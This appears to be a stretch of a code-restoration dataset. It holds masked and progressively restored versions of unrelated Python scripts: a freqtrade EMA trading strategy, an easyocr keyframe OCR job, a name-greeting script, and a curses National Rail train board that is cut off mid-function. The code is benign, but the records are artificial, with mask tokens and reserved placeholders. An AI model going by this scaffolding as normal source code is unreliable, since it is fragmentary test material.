"step-3": "<mask token>\n\n\nclass ema(IStrategy):\n max_open_trades = 10\n stake_amount = 50\n stoploss = -1\n minimal_roi = {'0': 10}\n timeframe = '5m'\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n process_only_new_candles = False\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n order_types = {'buy': 'limit', 'sell': 'limit', 'stoploss': 'market',\n 'stoploss_on_exchange': False}\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-4": "from freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy as np\n\n\nclass ema(IStrategy):\n max_open_trades = 10\n stake_amount = 50\n stoploss = -1\n minimal_roi = {'0': 10}\n timeframe = '5m'\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n process_only_new_candles = False\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n order_types = {'buy': 'limit', 'sell': 'limit', 'stoploss': 'market',\n 'stoploss_on_exchange': False}\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-5": "# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy as np# noqa\n\n\nclass ema(IStrategy):\n\n max_open_trades = 10\n stake_amount = 50\n # Minimal ROI designed for the strategy.\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n\n # Optimal stoploss designed for the strategy\n # This attribute will be overridden if the config file contains \"stoploss\"\n stoploss = -1\n\n minimal_roi = {\n \"0\": 10\n }\n\n # Optimal timeframe for the strategy\n timeframe = '5m'\n\n # trailing stoploss\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n\n # run \"populate_indicators\" only for new candle\n process_only_new_candles = False\n\n # Experimental settings (configuration will overide these if set)\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'market',\n 'stoploss_on_exchange': False\n }\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n\n dataframe['ema'] =dataframe['ema6']-dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n\n dataframe['ema']= dataframe['ema']*0.6 + dataframe['ema2']*0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n\n dataframe.loc[\n (\n (qtpylib.crossed_above(dataframe['ema'],dataframe['ema2']))\n ),'buy'] = 1\n\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[(qtpylib.crossed_below(dataframe['ema'], dataframe['ema2'])),'sell'] = 1\n\n return dataframe",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import easyocr
import cv2
import json
import numpy as np
import os
import os.path
import glob
def convert(o):
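    # json.dump cannot serialise numpy scalars, so unwrap them to native types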
    if isinstance(o, np.generic):
        return o.item()
raise TypeError
readers = [
    easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu=False),
#easyocr.Reader(['ch_tra'], gpu = False),
#easyocr.Reader(['fa'], gpu = False),
#easyocr.Reader(['hi'], gpu = False),
#easyocr.Reader(['ja'], gpu = False),
#easyocr.Reader(['ko'], gpu = False),
#easyocr.Reader(['th'], gpu = False),
]
basedir = "keyframes/"
dirs = os.listdir(basedir)
for d in dirs:
outfile = 'ocr/' + d + '.json'
if os.path.isfile(outfile):
print("found " + outfile + ", skipping")
continue
files = glob.glob(basedir + d + "/*.png")
ocr = {}
for f in files:
i = f.split("_")[-2]
img = cv2.imread(f)
results = []
for reader in readers:
results = results + reader.readtext(img)
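        # keep only detections that carry text and at least 10% confidence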
        h = list(filter(lambda result: len(result) > 2 and len(result[1]) > 0 and result[2] >= 0.1, results))
if len(h) > 0:
ocr[i] = h
with open(outfile,'w') as f:
json.dump(ocr, f, indent=1, default=convert)
print(d)
|
normal
|
{
"blob_id": "7057b882ca1ce2c08e9ba7add5f115636b9b319e",
"index": 8745,
"step-1": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\n<mask token>\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
"step-3": "<mask token>\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\nreaders = [easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu=\n False)]\nbasedir = 'keyframes/'\ndirs = os.listdir(basedir)\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
"step-4": "import easyocr\nimport cv2\nimport json\nimport numpy as np\nimport os\nimport os.path\nimport glob\n\n\ndef convert(o):\n if isinstance(o, np.generic):\n return o.item()\n raise TypeError\n\n\nreaders = [easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu=\n False)]\nbasedir = 'keyframes/'\ndirs = os.listdir(basedir)\nfor d in dirs:\n outfile = 'ocr/' + d + '.json'\n if os.path.isfile(outfile):\n print('found ' + outfile + ', skipping')\n continue\n files = glob.glob(basedir + d + '/*.png')\n ocr = {}\n for f in files:\n i = f.split('_')[-2]\n img = cv2.imread(f)\n results = []\n for reader in readers:\n results = results + reader.readtext(img)\n h = list(filter(lambda result: len(result) > 2 and len(result[1]) >\n 0 and result[2] >= 0.1, results))\n if len(h) > 0:\n ocr[i] = h\n with open(outfile, 'w') as f:\n json.dump(ocr, f, indent=1, default=convert)\n print(d)\n",
"step-5": "import easyocr\r\nimport cv2\r\nimport json\r\nimport numpy as np\r\nimport os\r\nimport os.path\r\nimport glob\r\n\r\ndef convert(o):\r\n if isinstance(o, np.generic): return o.item() \r\n raise TypeError\r\n\r\nreaders = [\r\n easyocr.Reader(['la', 'en', 'de', 'fr', 'es', 'cs', 'is'], gpu = False),\r\n #easyocr.Reader(['ch_tra'], gpu = False),\r\n #easyocr.Reader(['fa'], gpu = False),\r\n #easyocr.Reader(['hi'], gpu = False), \r\n #easyocr.Reader(['ja'], gpu = False), \r\n #easyocr.Reader(['ko'], gpu = False),\r\n #easyocr.Reader(['th'], gpu = False),\r\n]\r\n\r\nbasedir = \"keyframes/\"\r\n\r\ndirs = os.listdir(basedir)\r\n\r\n\r\nfor d in dirs:\r\n\r\n outfile = 'ocr/' + d + '.json'\r\n if os.path.isfile(outfile):\r\n print(\"found \" + outfile + \", skipping\")\r\n continue\r\n \r\n files = glob.glob(basedir + d + \"/*.png\")\r\n \r\n ocr = {}\r\n\r\n for f in files:\r\n i = f.split(\"_\")[-2]\r\n img = cv2.imread(f)\r\n \r\n results = []\r\n for reader in readers:\r\n results = results + reader.readtext(img)\r\n \r\n h = list(filter(lambda result : len(result) > 2 and len(result[1]) > 0 and result[2] >= 0.1, results))\r\n \r\n if len(h) > 0:\r\n ocr[i] = h\r\n \r\n with open(outfile,'w') as f: \r\n json.dump(ocr, f, indent=1, default=convert)\r\n \r\n print(d)\r\n \r\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('Please enter your name:')
<|reserved_special_token_0|>
if user_name in names:
print('Hi there, {}!'.format(user_name))
else:
print('Who goes there?')
<|reserved_special_token_1|>
names = ['Mia', 'Francis', 'Eva']
print('Please enter your name:')
user_name = input()
if user_name in names:
print('Hi there, {}!'.format(user_name))
else:
print('Who goes there?')
<|reserved_special_token_1|>
# pick three names
names = ["Mia", "Francis", "Eva"]
# prompt user for his/her name
print("Please enter your name:")
user_name = input()
if user_name in names:
print("Hi there, {}!".format(user_name))
else:
print("Who goes there?")
|
flexible
|
{
"blob_id": "59c33383365d10c108253f7b5a210d40718913a2",
"index": 9653,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Please enter your name:')\n<mask token>\nif user_name in names:\n print('Hi there, {}!'.format(user_name))\nelse:\n print('Who goes there?')\n",
"step-3": "names = ['Mia', 'Francis', 'Eva']\nprint('Please enter your name:')\nuser_name = input()\nif user_name in names:\n print('Hi there, {}!'.format(user_name))\nelse:\n print('Who goes there?')\n",
"step-4": "# pick three names\nnames = [\"Mia\", \"Francis\", \"Eva\"]\n\n# propmpt user for his/her name\nprint(\"Please enter your name:\")\nuser_name = input()\nif user_name in names:\n print(\"Hi there, {}!\".format(user_name))\nelse:\n print(\"Who goes there?\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
<|reserved_special_token_0|>
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
LDB_TOKEN = 'NULLTOKEN'
WSDL = (
'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
)
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.
ComplexType([xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.
String())]))
header_value = header(TokenValue=LDB_TOKEN)
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
import curses
from zeep import Client
from zeep import xsd
from zeep.plugins import HistoryPlugin
import time
from datetime import datetime
import os
LDB_TOKEN = 'NULLTOKEN'
WSDL = (
'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
)
if LDB_TOKEN == '':
raise Exception(
'Please configure your OpenLDBWS token in getDepartureBoardExample!')
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.
ComplexType([xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.
String())]))
header_value = header(TokenValue=LDB_TOKEN)
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)
stdscr.addstr(height - 3, 6, 'Arrivals')
stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)
stdscr.addstr(height - 3, 19, 'Departures')
stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)
stdscr.addstr(height - 2, 6, 'Quit')
stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')
stdscr.addstr(1, 2, 'Train info powered by National Rail')
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.
location[0].locationName, curses.color_pair(2) | curses
.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != 'On time':
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',
_soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)
stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)
stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)
stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = '?'
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[
0].locationName, curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != 'On time':
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
<|reserved_special_token_1|>
import curses
from zeep import Client
from zeep import xsd
from zeep.plugins import HistoryPlugin
import time
from datetime import datetime
import os
LDB_TOKEN = 'NULLTOKEN'
WSDL = 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'
if LDB_TOKEN == '':
raise Exception("Please configure your OpenLDBWS token in getDepartureBoardExample!")
history = HistoryPlugin()
client = Client(wsdl=WSDL, plugins=[history])
header = xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken',
xsd.ComplexType([
xsd.Element(
'{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue',
xsd.String()),
])
)
header_value = header(TokenValue=LDB_TOKEN)
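# the token is attached to every OpenLDBWS call below via _soapheaders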
def main(stdscr):
res = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.erase()
while True:
height, width = stdscr.getmaxyx()
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.border(0)
stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)
stdscr.addstr(height - 3, 2, "[A]", curses.A_BOLD)
stdscr.addstr(height - 3, 6, "Arrivals")
stdscr.addstr(height - 3, 15, "[D]", curses.A_BOLD)
stdscr.addstr(height - 3, 19, "Departures")
stdscr.addstr(height - 2, 2, "[Q]", curses.A_BOLD)
stdscr.addstr(height - 2, 6, "Quit")
stdscr.addstr(height - 2, width - 28, "Version 1.0 By RaithSphere")
stdscr.addstr(1, 2, "Train info powered by National Rail")
stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))
stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)
stdscr.refresh()
stdscr.refresh()
key = stdscr.getch()
if key == ord('q'):
break
elif key == ord('d'):
res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Departure's from " + res2.locationName)
stdscr.addstr(5, width - width + 5, "Time", curses.A_BOLD)
stdscr.addstr(5, width - width + 15, "Destination", curses.A_BOLD)
stdscr.addstr(5, width - 25, "Plat", curses.A_BOLD)
stdscr.addstr(5, width - 15, "Expected", curses.A_BOLD)
stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res2.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = "?"
stdscr.addstr(7 + i, width - width + 5, t.std)
stdscr.addstr(7 + i, width - width + 15, t.destination.location[0].locationName,
curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.etd != "On time":
stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.etd)
i += 1
elif key == ord('a'):
res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN', _soapheaders=[header_value])
stdscr.erase()
stdscr.border(0)
stdscr.addstr(3, 2, "Arrivals's at " + res3.locationName)
stdscr.addstr(5, width - width + 5, "Time", curses.A_BOLD)
stdscr.addstr(5, width - width + 15, "Origin", curses.A_BOLD)
stdscr.addstr(5, width - 25, "Plat", curses.A_BOLD)
stdscr.addstr(5, width - 15, "Expected", curses.A_BOLD)
